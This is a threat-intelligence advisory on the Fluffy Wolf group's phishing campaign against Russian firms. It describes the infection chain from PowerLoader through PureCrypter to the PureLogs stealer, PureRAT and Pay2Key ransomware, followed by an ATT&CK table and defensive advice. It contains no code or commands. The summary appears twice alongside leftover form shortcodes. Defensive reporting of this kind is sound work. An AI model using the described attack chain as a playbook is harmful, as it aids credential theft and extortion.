EXECUTIVE SUMMARY
Fluffy Wolf, an organized cyber‐crime group active in early 2026, has been targeting Russian enterprises across construction, consulting, manufacturing, engineering, retail and e‐commerce. The campaign relies on phishing emails that masquerade as legitimate business correspondence, often referencing unpaid invoices or debt notices. Delivery mechanisms include malicious attachments and links to compromised public code repositories, allowing the actors to bypass standard email filters. The primary objectives are credential harvesting through the PureLogs stealer and extortion via the Pay2Key ransomware, with occasional deployment of the PureRAT remote‐access tool to maintain persistence and enable further data exfiltration.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
Fluffy Wolf, an organized cyber‐crime group active in early 2026, has been targeting Russian enterprises across construction, consulting, manufacturing, engineering, retail and e‐commerce. The campaign relies on phishing emails that masquerade as legitimate business correspondence, often referencing unpaid invoices or debt notices. Delivery mechanisms include malicious attachments and links to compromised public code repositories, allowing the actors to bypass standard email filters. The primary objectives are credential harvesting through the PureLogs stealer and extortion via the Pay2Key ransomware, with occasional deployment of the PureRAT remote‐access tool to maintain persistence and enable further data exfiltration.[emaillocker id="1283"]
The infection chain begins when a recipient opens a malicious attachment or clicks a link to a public code repository, which drops a compressed archive containing a PE file or script. That file launches a PowerLoader downloader that silently invokes PowerShell to fetch the PureCrypter loader. PureCrypter unpacks in memory, decrypts the payload and injects it into trusted processes such as RegAsm.exe or InstallUtil.exe. Once active, the payload deploys the PureLogs stealer, the PureRAT trojan, or the Pay2Key ransomware.
Command‐and‐control communication occurs over HTTP, with encrypted data streams masking exfiltration and encryption activities. The campaign poses a serious risk because it blends credential theft with ransomware, giving attackers multiple avenues for profit and persistence. The use of legitimate‐looking repository URLs and encrypted PowerShell commands hampers traditional signature‐based detection, while the in‐memory decryption of payloads reduces forensic visibility. Organizations should harden email gateways, enforce attachment sandboxing, and block unauthenticated downloads from public code repositories. Continuous monitoring for abnormal PowerShell activity, regular patching of underlying software, and maintaining offline, immutable backups will limit impact and accelerate recovery after an infection.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Defense Evasion | T1027.003 | Obfuscated Files or Information | Steganography |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Credential Access | T1555.004 | Credentials from Password Stores | Windows Credential Manager |
| Credential Access | T1552.002 | Unsecured Credentials | Credentials in Registry |
| Discovery | T1082 | System Information Discovery | — |
| Lateral Movement | T1021.001 | Remote Services | Remote Desktop Protocol |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
REFERENCES:
The reports contain further technical details:
https://bi.zone/eng/expertise/blog/fluffy-wolf-ispytal-novinki-na-rossiyskikh-kompaniyakh/
https://securityonline.info/fluffy-wolf-phishing-attacks-powerloader/